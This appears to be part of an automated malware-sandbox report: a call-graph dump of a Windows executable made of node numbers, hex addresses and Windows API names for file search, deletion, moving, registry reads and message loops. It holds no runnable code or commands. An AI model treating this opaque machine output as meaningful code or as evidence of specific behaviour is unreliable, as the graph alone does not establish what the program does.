99234->99233 99235 170728 99234->99235 99236 13410a 2 API calls 99235->99236 99237 170733 99236->99237 99237->99233 99238->99200 99240 1338b5 99239->99240 99241 1338a8 99239->99241 99240->99197 99243 18394d 99240->99243 99242 13410a 2 API calls 99241->99242 99242->99240 99246 18384c 99243->99246 99245 183959 WriteFile 99245->99197 99247 18385e 99246->99247 99248 183853 99246->99248 99247->99245 99253 1342ae SetFilePointerEx 99248->99253 99250 1838b8 SetFilePointerEx 99254 1342ae SetFilePointerEx 99250->99254 99252 1838d7 99252->99245 99253->99250 99254->99252 99256 13133d 59 API calls 99255->99256 99257 183f52 GetFileAttributesW 99256->99257 99258 183f66 GetLastError 99257->99258 99260 183f7f Mailbox 99257->99260 99259 183f73 CreateDirectoryW 99258->99259 99261 183f81 99258->99261 99259->99260 99259->99261 99260->98723 99261->99260 99262 131981 59 API calls 99261->99262 99263 183fc3 99262->99263 99264 183f1d 59 API calls 99263->99264 99265 183fcc 99264->99265 99265->99260 99266 183fd0 CreateDirectoryW 99265->99266 99266->99260 99267->98691 99268->98721 99269->98721 99271 19a918 99270->99271 99272 19a970 99270->99272 99273 140fe6 Mailbox 59 API calls 99271->99273 99272->98730 99276 19a93a 99273->99276 99274 140fe6 Mailbox 59 API calls 99274->99276 99276->99272 99276->99274 99344 17715b 59 API calls Mailbox 99276->99344 99278 1878ac 99277->99278 99280 1878e3 99277->99280 99279 140fe6 Mailbox 59 API calls 99278->99279 99278->99280 99279->99280 99281 176ebc 99280->99281 99282 176f06 99281->99282 99290 176f1c Mailbox 99281->99290 99283 131a36 59 API calls 99282->99283 99283->99290 99284 176f47 99285 19c355 299 API calls 99284->99285 99293 176f53 99285->99293 99286 176f5a 99345 12a820 99286->99345 99289 177002 99289->98732 99290->99284 99290->99286 99291 176f91 99292 176fdc 99291->99292 99291->99293 99295 176fc1 99291->99295 99292->99293 99367 18a48d 89 API calls 4 library calls 99292->99367 99368 176cf1 59 API calls Mailbox 99293->99368 99362 17706d 99295->99362 99297->98732 99298->98741 99299->98746 99384 133740 99300->99384 99302 12bb86 99479 18a48d 89 API calls 4 library calls 99302->99479 99304 1630b6 99480 18a48d 89 API calls 4 library calls 99304->99480 99306 12b07f 99306->99302 99306->99304 99307 1630d4 99306->99307 99338 12b132 Mailbox _memmove 99306->99338 99481 18a48d 89 API calls 4 library calls 99307->99481 99309 16355e 99341 12b4dd 99309->99341 99496 18a48d 89 API calls 4 library calls 99309->99496 99310 17730a 59 API calls 99310->99338 99311 16318a 99311->99341 99483 18a48d 89 API calls 4 library calls 99311->99483 99313 140fe6 59 API calls Mailbox 99313->99338 99317 163106 99317->99311 99482 12a9de 299 API calls 99317->99482 99320 1253b0 299 API calls 99320->99338 99321 123b31 59 API calls 99321->99338 99324 163418 99325 1253b0 299 API calls 99324->99325 99326 163448 99325->99326 99326->99341 99490 1239be 99326->99490 99331 1631c3 99484 18a48d 89 API calls 4 library calls 99331->99484 99332 123c30 68 API calls 99332->99338 99333 16346f 99494 18a48d 89 API calls 4 library calls 99333->99494 99337 12523c 59 API calls 99337->99338 99338->99302 99338->99309 99338->99310 99338->99313 99338->99317 99338->99320 99338->99321 99338->99324 99338->99331 99338->99332 99338->99333 99338->99337 99339 131c9c 59 API calls 99338->99339 99338->99341 99389 123add 99338->99389 99396 12bc70 99338->99396 99477 123a40 59 API calls Mailbox 99338->99477 99478 125190 59 API calls Mailbox 99338->99478 99485 176c62 59 API calls 2 library calls 99338->99485 99486 19a9c3 85 API calls Mailbox 99338->99486 99487 176c1e 59 API calls Mailbox 99338->99487 99488 185ef2 68 API calls 99338->99488 99489 123ea3 68 API calls Mailbox 99338->99489 99495 18a12a 59 API calls 99338->99495 99339->99338 99341->98732 99342->98758 99343->98762 99344->99276 99346 162d51 99345->99346 99349 12a84c 99345->99349 99370 18a48d 89 API calls 4 library calls 99346->99370 99348 162d62 99348->99291 99350 162d6a 99349->99350 99357 12a888 _memmove 99349->99357 99371 18a48d 89 API calls 4 library calls 99350->99371 99352 140fe6 59 API calls Mailbox 99352->99357 99354 162dae 99372 12a9de 299 API calls 99354->99372 99355 1253b0 299 API calls 99355->99357 99357->99352 99357->99354 99357->99355 99358 162dc8 99357->99358 99359 12a975 99357->99359 99360 12a962 99357->99360 99358->99359 99373 18a48d 89 API calls 4 library calls 99358->99373 99359->99291 99360->99359 99369 19a9c3 85 API calls Mailbox 99360->99369 99363 177085 99362->99363 99366 19f1b2 91 API calls 99363->99366 99374 19495b 99363->99374 99364 1770d9 99364->99293 99366->99364 99367->99293 99368->99289 99369->99359 99370->99348 99371->99359 99372->99358 99373->99359 99375 140fe6 Mailbox 59 API calls 99374->99375 99376 19496c 99375->99376 99377 13433f 59 API calls 99376->99377 99378 194976 99377->99378 99379 124d37 84 API calls 99378->99379 99380 19498d GetEnvironmentVariableW 99379->99380 99383 187a51 59 API calls Mailbox 99380->99383 99382 1949aa 99382->99364 99383->99382 99385 13374f 99384->99385 99388 13376a 99384->99388 99386 131aa4 59 API calls 99385->99386 99387 133757 CharUpperBuffW 99386->99387 99387->99388 99388->99306 99390 15d3cd 99389->99390 99391 123aee 99389->99391 99392 140fe6 Mailbox 59 API calls 99391->99392 99393 123af5 99392->99393 99394 123b16 99393->99394 99497 123ba5 59 API calls Mailbox 99393->99497 99394->99338 99397 16359f 99396->99397 99408 12bc95 99396->99408 99588 18a48d 89 API calls 4 library calls 99397->99588 99399 12bf3b 99399->99338 99403 12c2b6 99403->99399 99404 12c2c3 99403->99404 99586 12c483 299 API calls Mailbox 99404->99586 99406 12c2ca LockWindowUpdate DestroyWindow GetMessageW 99406->99399 99409 12c2fc 99406->99409 99470 12bca5 Mailbox 99408->99470 99589 125376 60 API calls 99408->99589 99590 17700c 299 API calls 99408->99590 99410 164509 TranslateMessage DispatchMessageW GetMessageW 99409->99410 99410->99410 99412 164539 99410->99412 99411 1636b3 Sleep 99411->99470 99412->99399 99413 125376 60 API calls 99413->99470 99414 12bf54 timeGetTime 99414->99470 99416 16405d WaitForSingleObject 99418 16407d GetExitCodeProcess CloseHandle 99416->99418 99416->99470 99417 12c210 Sleep 99452 12c1fa Mailbox 99417->99452 99426 12c36b 99418->99426 99419 131c9c 59 API calls 99419->99470 99420 131207 59 API calls 99420->99452 99422 1643a9 Sleep 99422->99452 99423 140fe6 59 API calls Mailbox 99423->99470 99424 126cd8 277 API calls 99424->99470 99426->99338 99427 12c324 timeGetTime 99587 125376 60 API calls 99427->99587 99428 14083e timeGetTime 99428->99452 99430 184148 66 API calls 99430->99452 99431 164440 GetExitCodeProcess 99434 164456 WaitForSingleObject 99431->99434 99435 16446c CloseHandle 99431->99435 99432 124d37 84 API calls 99432->99470 99433 126d79 109 API calls 99433->99470 99434->99435 99434->99470 99435->99452 99436 1a6562 110 API calls 99436->99452 99439 1638aa Sleep 99439->99470 99440 1644c8 Sleep 99440->99470 99442 131a36 59 API calls 99442->99452 99447 12b020 277 API calls 99447->99470 99449 12c26d 99451 131a36 59 API calls 99449->99451 99454 12bf25 Mailbox 99451->99454 99452->99417 99452->99420 99452->99426 99452->99428 99452->99430 99452->99431 99452->99436 99452->99439 99452->99440 99452->99442 99452->99470 99597 182baf 60 API calls 99452->99597 99598 125376 60 API calls 99452->99598 99599 123ea3 68 API calls Mailbox 99452->99599 99600 126cd8 299 API calls 99452->99600 99601 1770e2 59 API calls 99452->99601 99602 1857ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 99452->99602 99453 19c355 277 API calls 99453->99470 99454->99399 99585 12c460 10 API calls Mailbox 99454->99585 99455 18a48d 89 API calls 99455->99470 99457 131a36 59 API calls 99457->99470 99458 12a820 277 API calls 99458->99470 99459 125190 59 API calls Mailbox 99459->99470 99460 1253b0 277 API calls 99460->99470 99461 1239be 68 API calls 99461->99470 99463 176cf1 59 API calls Mailbox 99463->99470 99464 163e13 VariantClear 99464->99470 99465 163ea9 VariantClear 99465->99470 99466 163c57 VariantClear 99466->99470 99467 1241c4 59 API calls Mailbox 99467->99470 99468 177aad 59 API calls 99468->99470 99469 123ea3 68 API calls 99469->99470 99470->99411 99470->99413 99470->99414 99470->99416 99470->99417 99470->99419 99470->99422 99470->99423 99470->99424 99470->99426 99470->99427 99470->99432 99470->99433 99470->99447 99470->99449 99470->99452 99470->99453 99470->99454 99470->99455 99470->99457 99470->99458 99470->99459 99470->99460 99470->99461 99470->99463 99470->99464 99470->99465 99470->99466 99470->99467 99470->99468 99470->99469 99471 18412a 3 API calls 99470->99471 99472 19e60c 130 API calls 99470->99472 99475 1342cf CloseHandle 99470->99475 99498 1252b0 99470->99498 99507 129a00 99470->99507 99514 129c80 99470->99514 99545 18c270 99470->99545 99552 18e4a0 99470->99552 99555 18bcd6 99470->99555 99591 1a6655 59 API calls 99470->99591 99592 18a058 59 API calls Mailbox 99470->99592 99593 17e0aa 59 API calls 99470->99593 99594 176c62 59 API calls 2 library calls 99470->99594 99595 1238ff 59 API calls 99470->99595 99596 123a40 59 API calls Mailbox 99470->99596 99471->99470 99472->99470 99475->99470 99477->99338 99478->99338 99479->99304 99480->99341 99481->99341 99482->99311 99483->99341 99484->99341 99485->99338 99486->99338 99487->99338 99488->99338 99489->99338 99491 1239c9 99490->99491 99492 1239f0 99491->99492 99881 123ea3 68 API calls Mailbox 99491->99881 99492->99333 99494->99341 99495->99338 99496->99341 99497->99394 99499 1252c6 99498->99499 99503 125313 99498->99503 99500 1252d3 PeekMessageW 99499->99500 99499->99503 99501 1252ec 99500->99501 99500->99503 99501->99470 99503->99501 99504 15df68 TranslateAcceleratorW 99503->99504 99505 125352 TranslateMessage DispatchMessageW 99503->99505 99506 12533e PeekMessageW 99503->99506 99603 12359e 99503->99603 99504->99503 99504->99506 99505->99506 99506->99501 99506->99503 99508 129a1d 99507->99508 99510 129a31 99507->99510 99608 1294e0 99508->99608 99642 18a48d 89 API calls 4 library calls 99510->99642 99512 129a28 99512->99470 99513 162478 99513->99513 99515 129cb5 99514->99515 99516 16247d 99515->99516 99519 129d1f 99515->99519 99529 129d79 99515->99529 99517 1253b0 299 API calls 99516->99517 99518 162492 99517->99518 99543 129f50 Mailbox 99518->99543 99652 18a48d 89 API calls 4 library calls 99518->99652 99522 131207 59 API calls 99519->99522 99519->99529 99520 131207 59 API calls 99520->99529 99523 1624d8 99522->99523 99525 142f70 __cinit 67 API calls 99523->99525 99524 142f70 __cinit 67 API calls 99524->99529 99525->99529 99526 1624fa 99526->99470 99527 18a48d 89 API calls 99527->99543 99528 1239be 68 API calls 99528->99543 99529->99520 99529->99524 99529->99526 99531 129f3a 99529->99531 99529->99543 99531->99543 99653 18a48d 89 API calls 4 library calls 99531->99653 99535 12a775 99657 18a48d 89 API calls 4 library calls 99535->99657 99536 1253b0 299 API calls 99536->99543 99537 1627f9 99537->99470 99538 124230 59 API calls 99538->99543 99543->99527 99543->99528 99543->99535 99543->99536 99543->99538 99544 12a058 99543->99544 99651 131bcc 59 API calls 2 library calls 99543->99651 99654 177aad 59 API calls 99543->99654 99655 19ccac 299 API calls 99543->99655 99656 19bc26 299 API calls Mailbox 99543->99656 99658 125190 59 API calls Mailbox 99543->99658 99659 199ab0 299 API calls Mailbox 99543->99659 99544->99470 99546 124d37 84 API calls 99545->99546 99547 18c286 99546->99547 99660 184005 99547->99660 99549 18c28e 99550 18c292 GetLastError 99549->99550 99551 18c2a7 99549->99551 99550->99551 99551->99470 99698 18f87d 99552->99698 99554 18e4b0 99554->99470 99556 18bcf5 99555->99556 99584 18bdbb Mailbox 99555->99584 99557 12502b 59 API calls 99556->99557 99559 18bd00 99557->99559 99558 124d37 84 API calls 99560 18bdf3 99558->99560 99562 12502b 59 API calls 99559->99562 99561 124d37 84 API calls 99560->99561 99563 18be05 99561->99563 99564 18bd14 99562->99564 99768 183ce2 99563->99768 99566 131207 59 API calls 99564->99566 99564->99584 99568 18bd25 99566->99568 99567 18bdc3 Mailbox 99567->99470 99569 131207 59 API calls 99568->99569 99570 18bd2e 99569->99570 99571 124d37 84 API calls 99570->99571 99572 18bd3b 99571->99572 99573 140119 59 API calls 99572->99573 99574 18bd4e 99573->99574 99575 1317e0 59 API calls 99574->99575 99576 18bd5f 99575->99576 99577 18bd88 Mailbox 99576->99577 99578 18412a 3 API calls 99576->99578 99579 12502b 59 API calls 99577->99579 99580 18bd6e 99578->99580 99579->99584 99580->99577 99581 131a36 59 API calls 99580->99581 99582 18bd7f 99581->99582 99583 183f1d 63 API calls 99582->99583 99583->99577 99584->99558 99584->99567 99585->99403 99586->99406 99587->99470 99588->99408 99589->99408 99590->99408 99591->99470 99592->99470 99593->99470 99594->99470 99595->99470 99596->99470 99597->99452 99598->99452 99599->99452 99600->99452 99601->99452 99602->99452 99604 1235e2 99603->99604 99606 1235b0 99603->99606 99604->99503 99605 1235d5 IsDialogMessageW 99605->99604 99605->99606 99606->99604 99606->99605 99607 15d273 GetClassLongW 99606->99607 99607->99605 99607->99606 99609 1253b0 299 API calls 99608->99609 99610 12951f 99609->99610 99611 162001 99610->99611 99627 129527 _memmove 99610->99627 99644 125190 59 API calls Mailbox 99611->99644 99613 1622c0 99650 18a48d 89 API calls 4 library calls 99613->99650 99615 1622de 99615->99615 99616 129583 99616->99512 99617 129944 99620 140fe6 Mailbox 59 API calls 99617->99620 99618 12986a 99621 1622b1 99618->99621 99622 12987f 99618->99622 99619 140fe6 59 API calls Mailbox 99619->99627 99626 1296e3 _memmove 99620->99626 99649 19a983 59 API calls 99621->99649 99625 140fe6 Mailbox 59 API calls 99622->99625 99624 129741 99624->99618 99631 1622a0 99624->99631 99636 12977d 99624->99636 99638 162278 99624->99638 99640 162253 99624->99640 99645 128180 299 API calls 99624->99645 99625->99636 99626->99624 99629 140fe6 Mailbox 59 API calls 99626->99629 99633 12970e 99626->99633 99627->99613 99627->99616 99627->99617 99627->99619 99627->99624 99628 1296cf 99627->99628 99628->99617 99630 1296dc 99628->99630 99629->99633 99632 140fe6 Mailbox 59 API calls 99630->99632 99648 18a48d 89 API calls 4 library calls 99631->99648 99632->99626 99633->99624 99643 12cca0 299 API calls 99633->99643 99636->99512 99647 18a48d 89 API calls 4 library calls 99638->99647 99646 18a48d 89 API calls 4 library calls 99640->99646 99642->99513 99643->99624 99644->99617 99645->99624 99646->99636 99647->99636 99648->99636 99649->99613 99650->99615 99651->99543 99652->99543 99653->99543 99654->99543 99655->99543 99656->99543 99657->99537 99658->99543 99659->99543 99661 131207 59 API calls 99660->99661 99662 184024 99661->99662 99663 131207 59 API calls 99662->99663 99664 18402d 99663->99664 99665 131207 59 API calls 99664->99665 99666 184036 99665->99666 99684 140284 99666->99684 99671 18405c 99673 140119 59 API calls 99671->99673 99672 131900 59 API calls 99672->99671 99674 184070 FindFirstFileW 99673->99674 99675 1840fc FindClose 99674->99675 99678 18408f 99674->99678 99680 184107 Mailbox 99675->99680 99676 1840d7 FindNextFileW 99676->99678 99677 131c9c 59 API calls 99677->99678 99678->99675 99678->99676 99678->99677 99679 1317e0 59 API calls 99678->99679 99681 131900 59 API calls 99678->99681 99679->99678 99680->99549 99682 1840c8 DeleteFileW 99681->99682 99682->99676 99683 1840f3 FindClose 99682->99683 99683->99680 99696 151b70 99684->99696 99687 1402b0 99689 131821 59 API calls 99687->99689 99688 1402cd 99690 1319e1 59 API calls 99688->99690 99691 1402bc 99689->99691 99690->99691 99692 13133d 59 API calls 99691->99692 99693 1402c8 99692->99693 99694 184fec GetFileAttributesW 99693->99694 99695 18404a 99694->99695 99695->99671 99695->99672 99697 140291 GetFullPathNameW 99696->99697 99697->99687 99697->99688 99699 18f898 99698->99699 99700 18f8f2 99698->99700 99701 140fe6 Mailbox 59 API calls 99699->99701 99760 18fbb7 59 API calls 99700->99760 99703 18f89f 99701->99703 99704 18f8ab 99703->99704 99758 133df7 60 API calls Mailbox 99703->99758 99706 124d37 84 API calls 99704->99706 99711 18f8bd 99706->99711 99707 18f9cb 99754 188cd0 99707->99754 99708 18f8ff 99708->99707 99709 18f8d9 99708->99709 99715 18f93f 99708->99715 99709->99554 99713 133e47 67 API calls 99711->99713 99712 18f9d2 99718 18394d 3 API calls 99712->99718 99714 18f8c9 99713->99714 99714->99708 99716 18f8cd 99714->99716 99717 124d37 84 API calls 99715->99717 99716->99709 99759 133f0b CloseHandle 99716->99759 99723 18f946 99717->99723 99734 18f9ae Mailbox 99718->99734 99720 18f9c1 99735 18399c 99720->99735 99721 18f97a 99724 13162d 59 API calls 99721->99724 99723->99720 99723->99721 99726 18f98a 99724->99726 99725 1342cf CloseHandle 99727 18fa20 99725->99727 99728 131c9c 59 API calls 99726->99728 99727->99709 99761 133f0b CloseHandle 99727->99761 99729 18f994 99728->99729 99731 131900 59 API calls 99729->99731 99732 18f9a2 99731->99732 99733 18399c 66 API calls 99732->99733 99733->99734 99734->99709 99734->99725 99736 1839af 99735->99736 99737 183a15 99735->99737 99736->99737 99738 1839b4 99736->99738 99739 18394d 3 API calls 99737->99739 99740 183a09 99738->99740 99743 1839be 99738->99743 99753 1839fd Mailbox 99739->99753 99766 183a35 62 API calls Mailbox 99740->99766 99742 1839de 99745 1340cd 59 API calls 99742->99745 99743->99742 99744 1839c8 99743->99744 99746 1340cd 59 API calls 99744->99746 99747 1839e6 99745->99747 99748 1839d0 99746->99748 99765 1838e0 61 API calls Mailbox 99747->99765 99750 13402a 61 API calls 99748->99750 99751 1839dc 99750->99751 99762 18397e 99751->99762 99753->99734 99755 188cd9 99754->99755 99756 188cde 99754->99756 99767 187d6e 61 API calls 2 library calls 99755->99767 99756->99712 99758->99704 99759->99709 99760->99708 99761->99709 99763 18394d 3 API calls 99762->99763 99764 183990 99763->99764 99764->99753 99765->99751 99766->99753 99767->99756 99769 131207 59 API calls 99768->99769 99770 183cff 99769->99770 99771 131207 59 API calls 99770->99771 99772 183d07 99771->99772 99773 131207 59 API calls 99772->99773 99774 183d0f 99773->99774 99775 131207 59 API calls 99774->99775 99776 183d17 99775->99776 99777 140284 60 API calls 99776->99777 99778 183d21 99777->99778 99779 140284 60 API calls 99778->99779 99780 183d2b 99779->99780 99814 184f82 99780->99814 99782 183d36 99783 184fec GetFileAttributesW 99782->99783 99784 183d41 99783->99784 99785 183d53 99784->99785 99786 131900 59 API calls 99784->99786 99787 184fec GetFileAttributesW 99785->99787 99786->99785 99788 183d5b 99787->99788 99789 183d68 99788->99789 99790 131900 59 API calls 99788->99790 99791 131207 59 API calls 99789->99791 99790->99789 99792 183d70 99791->99792 99793 131207 59 API calls 99792->99793 99794 183d78 99793->99794 99795 140119 59 API calls 99794->99795 99796 183d89 FindFirstFileW 99795->99796 99797 183eb4 FindClose 99796->99797 99806 183dac Mailbox 99796->99806 99803 183ebe Mailbox 99797->99803 99798 183e88 FindNextFileW 99798->99806 99799 131a36 59 API calls 99799->99806 99801 131c9c 59 API calls 99801->99806 99802 1317e0 59 API calls 99802->99806 99803->99567 99804 131900 59 API calls 99804->99806 99805 18412a 3 API calls 99805->99806 99806->99797 99806->99798 99806->99799 99806->99801 99806->99802 99806->99804 99806->99805 99807 183e2a 99806->99807 99808 183eab FindClose 99806->99808 99809 183ef7 CopyFileExW 99806->99809 99813 183e6b DeleteFileW 99806->99813 99825 184561 99806->99825 99810 13151f 61 API calls 99807->99810 99811 183e4e MoveFileW 99807->99811 99812 183e3e DeleteFileW 99807->99812 99808->99803 99809->99806 99810->99807 99811->99806 99812->99806 99813->99806 99815 131207 59 API calls 99814->99815 99816 184f97 99815->99816 99817 131207 59 API calls 99816->99817 99818 184f9f 99817->99818 99819 140119 59 API calls 99818->99819 99820 184fae 99819->99820 99821 140119 59 API calls 99820->99821 99822 184fbe 99821->99822 99823 13151f 61 API calls 99822->99823 99824 184fce Mailbox 99823->99824 99824->99782 99826 18457d 99825->99826 99827 184590 99826->99827 99828 184582 99826->99828 99830 131207 59 API calls 99827->99830 99829 131c9c 59 API calls 99828->99829 99878 18458b Mailbox 99829->99878 99831 184598 99830->99831 99832 131207 59 API calls 99831->99832 99833 1845a0 99832->99833 99834 131207 59 API calls 99833->99834 99835 1845ab 99834->99835 99836 131207 59 API calls 99835->99836 99837 1845b3 99836->99837 99838 131207 59 API calls 99837->99838 99839 1845bb 99838->99839 99840 131207 59 API calls 99839->99840 99841 1845c3 99840->99841 99842 131207 59 API calls 99841->99842 99843 1845cb 99842->99843 99844 131207 59 API calls 99843->99844 99845 1845d3 99844->99845 99846 140119 59 API calls 99845->99846 99847 1845ea 99846->99847 99848 140119 59 API calls 99847->99848 99849 184603 99848->99849 99850 131609 59 API calls 99849->99850 99851 18460f 99850->99851 99852 184622 99851->99852 99853 131981 59 API calls 99851->99853 99854 131609 59 API calls 99852->99854 99853->99852 99855 18462b 99854->99855 99856 18463b 99855->99856 99857 131981 59 API calls 99855->99857 99858 131c9c 59 API calls 99856->99858 99857->99856 99859 184647 99858->99859 99860 1317e0 59 API calls 99859->99860 99861 184653 99860->99861 99879 184713 59 API calls 99861->99879 99863 184662 99880 184713 59 API calls 99863->99880 99865 184675 99866 131609 59 API calls 99865->99866 99867 18467f 99866->99867 99868 184684 99867->99868 99869 184696 99867->99869 99871 131900 59 API calls 99868->99871 99870 131609 59 API calls 99869->99870 99872 18469f 99870->99872 99873 184691 99871->99873 99874 1846bd 99872->99874 99875 131900 59 API calls 99872->99875 99876 1317e0 59 API calls 99873->99876 99877 1317e0 59 API calls 99874->99877 99875->99873 99876->99874 99877->99878 99878->99806 99879->99863 99880->99865 99881->99492 99882->98774 99883 15e438 99889 126152 Mailbox 99883->99889 99884 126af8 99903 18a48d 89 API calls 4 library calls 99884->99903 99886 15efeb 99904 176cf1 59 API calls Mailbox 99886->99904 99888 15eff4 99889->99884 99889->99886 99889->99888 99891 15e2e9 VariantClear 99889->99891 99893 18413a 3 API calls 99889->99893 99894 18412a 3 API calls 99889->99894 99895 195e1d 95 API calls 99889->99895 99896 19e60c 130 API calls 99889->99896 99897 12cfd7 98 API calls 99889->99897 99898 18d6be 101 API calls 99889->99898 99899 12d679 97 API calls 99889->99899 99900 19f1b2 91 API calls 99889->99900 99901 125190 59 API calls Mailbox 99889->99901 99902 177aad 59 API calls 99889->99902 99891->99889 99893->99889 99894->99889 99895->99889 99896->99889 99897->99889 99898->99889 99899->99889 99900->99889 99901->99889 99902->99889 99903->99886 99904->99888 99905 1601f8 99906 1601fa 99905->99906 99909 184d18 SHGetFolderPathW 99906->99909 99910 131821 59 API calls 99909->99910 99911 160203 99910->99911 99912 12107d 99917 132fc5 99912->99917 99914 12108c 99915 142f70 __cinit 67 API calls 99914->99915 99916 121096 99915->99916 99918 132fd5 __ftell_nolock 99917->99918 99919 131207 59 API calls 99918->99919 99920 13308b 99919->99920 99948 1400cf 99920->99948 99922 133094 99955 1408c1 99922->99955 99925 131900 59 API calls 99926 1330ad 99925->99926 99961 134c94 99926->99961 99929 131207 59 API calls 99930 1330c5 99929->99930 99931 1319e1 59 API calls 99930->99931 99932 1330ce RegOpenKeyExW 99931->99932 99933 1701a3 RegQueryValueExW 99932->99933 99938 1330f0 Mailbox 99932->99938 99934 170235 RegCloseKey 99933->99934 99935 1701c0 99933->99935 99936 170247 _wcscat Mailbox __wsetenvp 99934->99936 99934->99938 99937 140fe6 Mailbox 59 API calls 99935->99937 99936->99938 99945 131a36 59 API calls 99936->99945 99946 134c94 59 API calls 99936->99946 99947 131609 59 API calls 99936->99947 99939 1701d9 99937->99939 99938->99914 99940 13433f 59 API calls 99939->99940 99941 1701e4 RegQueryValueExW 99940->99941 99942 170201 99941->99942 99944 17021b 99941->99944 99943 131821 59 API calls 99942->99943 99943->99944 99944->99934 99945->99936 99946->99936 99947->99936 99949 151b70 __ftell_nolock 99948->99949 99950 1400dc GetModuleFileNameW 99949->99950 99951 131a36 59 API calls 99950->99951 99952 140102 99951->99952 99953 140284 60 API calls 99952->99953 99954 14010c Mailbox 99953->99954 99954->99922 99956 151b70 __ftell_nolock 99955->99956 99957 1408ce GetFullPathNameW 99956->99957 99958 1408f0 99957->99958 99959 131821 59 API calls 99958->99959 99960 13309f 99959->99960 99960->99925 99962 134ca2 99961->99962 99966 134cc4 _memmove 99961->99966 99964 140fe6 Mailbox 59 API calls 99962->99964 99963 140fe6 Mailbox 59 API calls 99965 1330bc 99963->99965 99964->99966 99965->99929 99966->99963 99967 1892c8 99968 1892db 99967->99968 99969 1892d5 99967->99969 99971 1892ec 99968->99971 99972 142f85 _free 58 API calls 99968->99972 99970 142f85 _free 58 API calls 99969->99970 99970->99968 99973 142f85 _free 58 API calls 99971->99973 99974 1892fe 99971->99974 99972->99971 99973->99974 99975 134d83 99976 134dba 99975->99976 99977 134e37 99976->99977 99978 134dd8 99976->99978 100015 134e35 99976->100015 99980 1709c2 99977->99980 99981 134e3d 99977->99981 99982 134de5 99978->99982 99983 134ead PostQuitMessage 99978->99983 99979 134e1a DefWindowProcW 100002 134e28 99979->100002 100030 12c460 10 API calls Mailbox 99980->100030 99984 134e42 99981->99984 99985 134e65 SetTimer RegisterWindowMessageW 99981->99985 99986 170a35 99982->99986 99987 134df0 99982->99987 99983->100002 99989 170965 99984->99989 99990 134e49 KillTimer 99984->99990 99991 134e8e CreatePopupMenu 99985->99991 99985->100002 100033 182cce 97 API calls _memset 99986->100033 99992 134eb7 99987->99992 99993 134df8 99987->99993 99997 17099e MoveWindow 99989->99997 99998 17096a 99989->99998 99999 135ac3 Shell_NotifyIconW 99990->99999 99991->100002 100020 135b29 99992->100020 100000 134e03 99993->100000 100006 170a1a 99993->100006 99995 1709e9 100031 12c483 299 API calls Mailbox 99995->100031 99997->100002 100003 17096e 99998->100003 100004 17098d SetFocus 99998->100004 100005 134e5c 99999->100005 100007 134e9b 100000->100007 100008 134e0e 100000->100008 100003->100008 100010 170977 100003->100010 100004->100002 100027 1234e4 DeleteObject DestroyWindow Mailbox 100005->100027 100006->99979 100032 178854 59 API calls Mailbox 100006->100032 100028 135bd7 107 API calls _memset 100007->100028 100008->99979 100017 135ac3 Shell_NotifyIconW 100008->100017 100009 170a47 100009->99979 100009->100002 100029 12c460 10 API calls Mailbox 100010->100029 100015->99979 100016 134eab 100016->100002 100018 170a0e 100017->100018 100019 1359d3 94 API calls 100018->100019 100019->100015 100021 135bc2 100020->100021 100022 135b40 _memset 100020->100022 100021->100002 100023 1356f8 87 API calls 100022->100023 100024 135b67 100023->100024 100025 135bab KillTimer SetTimer 100024->100025 100026 170d6e Shell_NotifyIconW 100024->100026 100025->100021 100026->100025 100027->100002 100028->100016 100029->100002 100030->99995 100031->100008 100032->100015 100033->100009 100034 126981 100041 12373a 100034->100041 100036 126997 100050 127b3f 100036->100050 100038 1269bf 100040 12584d 100038->100040 100062 18a48d 89 API calls 4 library calls 100038->100062 100042 123746 100041->100042 100043 123758 100041->100043 100063 12523c 59 API calls 100042->100063 100045 123787 100043->100045 100046 12375e 100043->100046 100064 12523c 59 API calls 100045->100064 100048 140fe6 Mailbox 59 API calls 100046->100048 100049 123750 100048->100049 100049->100036 100051 13162d 59 API calls 100050->100051 100052 127b64 _wcscmp 100051->100052 100053 131a36 59 API calls 100052->100053 100055 127b98 Mailbox 100052->100055 100054 15ffad 100053->100054 100056 1317e0 59 API calls 100054->100056 100055->100038 100057 15ffb8 100056->100057 100065 123938 68 API calls 100057->100065 100059 15ffc9 100061 15ffcd Mailbox 100059->100061 100066 12523c 59 API calls 100059->100066 100061->100038 100062->100040 100063->100049 100064->100049 100065->100059 100066->100061 100067 121066 100072 12aaaa 100067->100072 100069 12106c 100070 142f70 __cinit 67 API calls 100069->100070 100071 121076 100070->100071 100073 12aacb 100072->100073 100105 1402eb 100073->100105 100077 12ab12 100078 131207 59 API calls 100077->100078 100079 12ab1c 100078->100079 100080 131207 59 API calls 100079->100080 100081 12ab26 100080->100081 100082 131207 59 API calls 100081->100082 100083 12ab30 100082->100083 100084 131207 59 API calls 100083->100084 100085 12ab6e 100084->100085 100086 131207 59 API calls 100085->100086 100087 12ac39 100086->100087 100115 140588 100087->100115 100091 12ac6b 100092 131207 59 API calls 100091->100092 100093 12ac75 100092->100093 100143 13fe2b 100093->100143 100095 12acbc 100096 12accc GetStdHandle 100095->100096 100097 12ad18 100096->100097 100098 162f39 100096->100098 100099 12ad20 OleInitialize 100097->100099 100098->100097 100100 162f42 100098->100100 100099->100069 100150 1870f3 64 API calls Mailbox 100100->100150 100102 162f49 100151 1877c2 CreateThread 100102->100151 100104 162f55 CloseHandle 100104->100099 100152 1403c4 100105->100152 100108 1403c4 59 API calls 100109 14032d 100108->100109 100110 131207 59 API calls 100109->100110 100111 140339 100110->100111 100112 131821 59 API calls 100111->100112 100113 12aad1 100112->100113 100114 1407bb 6 API calls 100113->100114 100114->100077 100116 131207 59 API calls 100115->100116 100117 140598 100116->100117 100118 131207 59 API calls 100117->100118 100119 1405a0 100118->100119 100159 1310c3 100119->100159 100122 1310c3 59 API calls 100123 1405b0 100122->100123 100124 131207 59 API calls 100123->100124 100125 1405bb 100124->100125 100126 140fe6 Mailbox 59 API calls 100125->100126 100127 12ac43 100126->100127 100128 13ff4c 100127->100128 100129 13ff5a 100128->100129 100130 131207 59 API calls 100129->100130 100131 13ff65 100130->100131 100132 131207 59 API calls 100131->100132 100133 13ff70 100132->100133 100134 131207 59 API calls 100133->100134 100135 13ff7b 100134->100135 100136 131207 59 API calls 100135->100136 100137 13ff86 100136->100137 100138 1310c3 59 API calls 100137->100138 100139 13ff91 100138->100139 100140 140fe6 Mailbox 59 API calls 100139->100140 100141 13ff98 RegisterWindowMessageW 100140->100141 100141->100091 100144 13fe3b 100143->100144 100145 17620c 100143->100145 100146 140fe6 Mailbox 59 API calls 100144->100146 100162 18a12a 59 API calls 100145->100162 100148 13fe43 100146->100148 100148->100095 